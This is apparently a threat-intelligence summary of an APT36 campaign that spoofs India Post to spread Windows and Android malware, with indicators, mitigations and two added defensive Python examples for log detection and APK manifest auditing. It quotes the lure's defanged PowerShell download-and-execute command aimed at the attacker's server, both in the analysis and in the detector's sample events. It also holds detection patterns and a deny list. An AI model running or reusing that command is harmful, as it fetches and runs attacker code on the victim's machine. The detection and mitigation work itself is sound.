
An advanced persistent threat (APT) group linked to Pakistan has been observed impersonating India’s postal service to distribute malware targeting both Windows and Android users. Cybersecurity firm CYFIRMA attributes the campaign with medium confidence to APT36 (also known as Transparent Tribe), a group historically active in South Asian cyber espionage. The operation involves a fake India Post website (`postindia[.]site`) delivering malicious PDFs to Windows users and a rogue Android app (`indiapost.apk`) designed to steal sensitive data.
TL;DR: Key Findings
- Campaign: APT36 spoofed India Post’s website to deliver malware via malicious PDFs (Windows) and a fake APK (Android).
- Tactics: PowerShell abuse (“ClickFix” technique) for Windows; Android app requests excessive permissions (contacts, location, files).
- Attribution: PDF metadata links to Pakistan’s “Prime Minister Youth Laptop Scheme” (PMYLS).
- IOCs: Domain: `postindia[.]site`; IP: `88.222.245[.]211`; APK hash: `cbf7457…`.
Technical Analysis
Windows Infection Chain
The attack begins with a malicious PDF hosted on the spoofed India Post website. When opened, the document instructs users to execute a PowerShell command via the Win + R dialog:

```powershell
powershell -w hidden -nop -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('hxxp://88.222.245[.]211/script.ps1')"
```
This connects to a command-and-control (C2) server, though CYFIRMA notes the server was inactive at the time of analysis. The PDF’s metadata reveals creation timestamps aligned with Pakistan’s timezone (October 2024) and references to PMYLS, a Pakistani government initiative.
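The one-liner above carries several traits that a process-creation rule can key on (hidden window, no profile, execution-policy bypass, `IEX` of a downloaded string) and, in this campaign, the report's C2 address. The following detection logic is an added example written for this summary; it is not CYFIRMA's code or any vendor rule. It runs over a few constructed, pipe-separated process-creation events (timestamp, parent image, image, command line), refangs `hxxp`/`[.]` notation so both defanged and live forms match, and flags a PowerShell launch when two or more ClickFix traits or any report IOC appear. The `explorer.exe` parent check is an assumption that reflects the Run-dialog launch the lure asks for.

```python
import re
from dataclasses import dataclass, field

# IOCs as published in the report (defanged); normalised below for matching
IOC_DOMAINS = {"postindia[.]site"}
IOC_IPS = {"88.222.245[.]211"}


def refang(s: str) -> str:
    """Turn defanged notation back into the form seen in real telemetry."""
    return s.replace("[.]", ".").replace("hxxp", "http")


REFANGED_IOCS = {refang(x) for x in IOC_DOMAINS | IOC_IPS}

# Traits of the ClickFix-style PowerShell one-liner described in the report
SUSPICIOUS_FLAGS = [
    (re.compile(r"(?i)(^|\s)-w(indowstyle)?\s+hidden\b"), "hidden window"),
    (re.compile(r"(?i)(^|\s)-nop(rofile)?\b"), "no profile"),
    (re.compile(r"(?i)(^|\s)-e(p|xecutionpolicy)\s+bypass\b"), "execution policy bypass"),
    (re.compile(r"(?i)\bIEX\b|Invoke-Expression"), "Invoke-Expression"),
    (re.compile(r"(?i)DownloadString\("), "remote script download"),
]


@dataclass
class Finding:
    line_no: int
    parent: str
    reasons: list = field(default_factory=list)
    iocs: list = field(default_factory=list)


def parse_event(line: str):
    """Constructed event format: ts|parent_image|image|command_line."""
    ts, parent, image, cmdline = line.split("|", 3)
    return ts, parent, image, cmdline


def analyse(lines):
    """Return a Finding for every PowerShell launch that looks like the lure's one-liner."""
    findings = []
    for i, line in enumerate(lines, 1):
        _ts, parent, image, cmdline = parse_event(line)
        if "powershell" not in image.lower():
            continue
        reasons = [label for rx, label in SUSPICIOUS_FLAGS if rx.search(cmdline)]
        iocs = [ioc for ioc in REFANGED_IOCS if ioc in refang(cmdline)]
        # Assumption: a Win+R launch shows explorer.exe as the parent process
        if parent.lower() == "explorer.exe" and reasons:
            reasons.append("launched from Run dialog / explorer")
        # Threshold of two traits keeps ordinary admin scripts (e.g. -ep AllSigned) quiet
        if len(reasons) >= 2 or iocs:
            findings.append(Finding(i, parent, reasons, iocs))
    return findings


# Constructed sample events; the first reproduces the report's command line
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    "2024-10-12T09:01:00Z|explorer.exe|" + PS + "|powershell -w hidden -nop -ep bypass -c "
    "\"IEX (New-Object Net.WebClient).DownloadString('hxxp://88.222.245[.]211/script.ps1')\"",
    "2024-10-12T09:02:00Z|services.exe|" + PS + "|powershell.exe -ExecutionPolicy AllSigned -File C:\\Scripts\\inventory.ps1",
    "2024-10-12T09:03:00Z|explorer.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c dir",
    "2024-10-12T09:04:00Z|outlook.exe|" + PS + "|powershell -nop -w hidden -c \"Get-Date\"",
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"event {f.line_no}: parent={f.parent} reasons={f.reasons} iocs={f.iocs}")
```

Events 1 and 4 are flagged (the first additionally carries the C2 IP as an IOC hit); the signed inventory script and the `cmd.exe` launch are not. In production the same checks would be applied to Sysmon Event ID 1 or Windows 4688 command lines, and the IOC set would be loaded from a feed rather than hard-coded.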
Android Malware Details
The fake “indiapost.apk” mimics the Google Play Store icon and requests 11 permissions, including access to:
- Contacts
- Location
- External storage
Once installed, the app registers a BootReceiver to maintain persistence, ensuring execution after device reboots. It also promotes a fraudulent casino app (“VivaGame”) to harvest financial data. Data exfiltration occurs via domains masquerading as Google Analytics.
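The permission set and the boot-time receiver are both visible in an APK's manifest, so a triage step can surface them before anything runs. The audit below is an added example for this summary, not code from CYFIRMA or from the malware analysis; it assumes the manifest has already been decoded to plain XML (for instance by apktool) and works on a constructed sample manifest that mirrors the pattern the report describes (contacts, location, storage, and a receiver bound to `BOOT_COMPLETED`). The sample is not the real `indiapost.apk` manifest, and the risk mapping is this example's own choice.

```python
import xml.etree.ElementTree as ET

# Attributes such as android:name live in the Android resource namespace
A = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest for illustration only; NOT extracted from indiapost.apk
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.fakepost">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="India Post">
    <activity android:name=".MainActivity"/>
    <receiver android:name=".BootReceiver" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Permissions a parcel-tracking app has little reason to hold (example's own mapping).
# RECEIVE_BOOT_COMPLETED is normal-level but is what makes a BootReceiver useful.
HIGH_RISK = {
    "android.permission.READ_CONTACTS": "contacts",
    "android.permission.ACCESS_FINE_LOCATION": "location",
    "android.permission.ACCESS_COARSE_LOCATION": "location",
    "android.permission.READ_EXTERNAL_STORAGE": "files",
    "android.permission.READ_SMS": "sms",
    "android.permission.RECEIVE_BOOT_COMPLETED": "boot persistence",
}


def audit_manifest(xml_text: str) -> dict:
    """Summarise requested permissions and boot-time receivers from a decoded manifest."""
    root = ET.fromstring(xml_text)
    perms = [p.get(A + "name") for p in root.iter("uses-permission")]
    risky = {p: HIGH_RISK[p] for p in perms if p in HIGH_RISK}

    # A receiver whose intent filter listens for BOOT_COMPLETED runs at every reboot
    boot_receivers = []
    for rcv in root.iter("receiver"):
        actions = {a.get(A + "name") for a in rcv.iter("action")}
        if "android.intent.action.BOOT_COMPLETED" in actions:
            boot_receivers.append(rcv.get(A + "name"))

    return {
        "package": root.get("package"),
        "permission_count": len(perms),
        "risky": risky,
        "boot_receivers": boot_receivers,
        # Example's own heuristic: persistence or several data-access permissions
        "verdict": "suspicious" if (boot_receivers or len(risky) >= 2) else "review",
    }


if __name__ == "__main__":
    report = audit_manifest(SAMPLE_MANIFEST)
    print(f"{report['package']}: {report['permission_count']} permissions, verdict={report['verdict']}")
    for perm, why in report["risky"].items():
        print(f"  {perm} -> {why}")
    print(f"  boot receivers: {report['boot_receivers']}")
```

On a real sample the same function would be pointed at the manifest apktool writes out, and the `HIGH_RISK` table tuned to what the app's advertised purpose actually needs; the point is that a parcel-tracking lure asking for contacts, precise location and a boot receiver stands out before any dynamic analysis.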
Mitigation and Detection
Organizations and individuals can take the following steps to mitigate risks:
Action | Implementation |
---|---|
Block IOCs | Add `postindia[.]site` and `88.222.245[.]211` to deny lists. |
Application Whitelisting | Restrict PowerShell execution to signed scripts. |
Android Safeguards | Disable “Unknown Sources” and audit app permissions. |
Conclusion
APT36’s cross-platform campaign underscores the group’s adaptability in leveraging social engineering and trusted brands for malware distribution. The use of Pakistan-linked lures (PMYLS) reinforces geopolitical motivations. Organizations should prioritize user awareness training and technical controls to counter such threats.
References
- “[APT36 Spoofs India Post Website to Infect Windows and Android Users](https://thehackernews.com/2025/03/apt36-spoofs-india-post-website-to.html)”. The Hacker News. March 27, 2025.
- “[Turning Aid into Attack: Exploitation of Pakistan’s Youth Laptop Scheme to Target India](https://www.cyfirma.com/research/turning-aid-into-attack-exploitation-of-pakistans-youth-laptop-scheme-to-target-india/)”. CYFIRMA. [Accessed March 2025].
- “APT36’s Evolution: New ElizaRAT Malware and Cloud-Based C2”. Dark Reading. November 2024.